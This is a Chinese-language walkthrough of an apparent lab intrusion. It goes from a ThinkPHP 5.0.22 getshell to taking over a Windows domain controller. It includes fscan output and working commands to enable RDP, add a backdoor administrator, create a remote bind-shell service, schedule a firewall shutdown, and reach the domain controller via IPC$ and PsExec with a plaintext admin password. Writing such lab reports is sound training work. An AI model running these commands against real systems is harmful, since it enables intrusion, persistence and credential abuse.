外围打点
常规nmap扫端口
访问发现是ThinkPHP V5框架,访问任意路径触发404得到具体版本号为5.0.22
直接跑工具进行getshell
蚁剑连接
直接获得了域管理员用户的权限,然后进行内网信息搜集
内网渗透
通过ipconfig /all查看内网网卡
通过DNS服务器可知域控ip为192.168.20.138,传入fscan进行扫描内网
192.168.20.138:135 open
192.168.20.136:135 open
192.168.20.136:3306 open
192.168.20.138:445 open
192.168.20.136:445 open
192.168.20.138:139 open
192.168.20.136:139 open
192.168.20.136:80 open
192.168.20.138:88 open
[+] 192.168.20.136 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle:http://192.168.20.136 code:200 len:931 title:None
[*] 192.168.20.136 SUN\WIN7 Windows 7 Professional 7601 Service Pack 1
[+] NetInfo:
[*]192.168.20.138
[->]DC
[->]192.168.20.138
[+] 192.168.20.138 MS17-010 (Windows Server 2008 HPC Edition 7600)
[*] 192.168.20.138 [+]DC SUN\DC Windows Server 2008 HPC Edition 7600
[+] http://192.168.20.136 poc-yaml-thinkphp5-controller-rce
[+] http://192.168.20.136 poc-yaml-thinkphp5023-method-rce poc1
通过扫描结果可以使用MS17-010试着打一下
(不得不说fscan还是强,这里还扫描出了thinkphp的洞,可以直接找到poc)
因为是在内网环境中,需要打个隧道或者直接上线msf进行路由转发,这里选择后者
使用蚁剑上传木马上线msf,设置路由route add 192.168.20.1/24 1,然后打ms17_010失败
开启远程桌面
# 开启远程桌面服务1
meterpreter > run post/windows/manage/enable_rdp
# 开启远程桌面服务2
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
# 开启远程桌面3
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
# 创建用户
net user demo 123qwe!@#WQE /add
net localgroup administrators demo /add
然后本地直接远连新建的用户
然后上传mimikatz进行利用,这里使用mimikatz进行ptt攻击
这里和刚刚的红日四可以是一个打法,关闭防火墙计划任务,设置木马服务
# 创建服务
sc \\192.168.20.138 create shell binpath= "c:\bind6666.exe"
# 启动服务
sc \\192.168.20.138 start shell
# 关闭防火墙计划任务
schtasks /S 192.168.20.138 /create /TN fwoff.bat /TR C:\fwoff.bat /SC minute /MO 1 /RU system
因为通过mimikatz还获得了明文密码,我们可以直接使用明文密码进行IPC连接
net use \\192.168.20.138\IPC$ /u:sun\administrator dc123.com
也可以通过上传psexec获取域控的shell
PsExec.exe \\192.168.20.138 -u administrator -p dc123.com -s cmd.exe
# -s 以系统权限运行
# -accepteula 第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
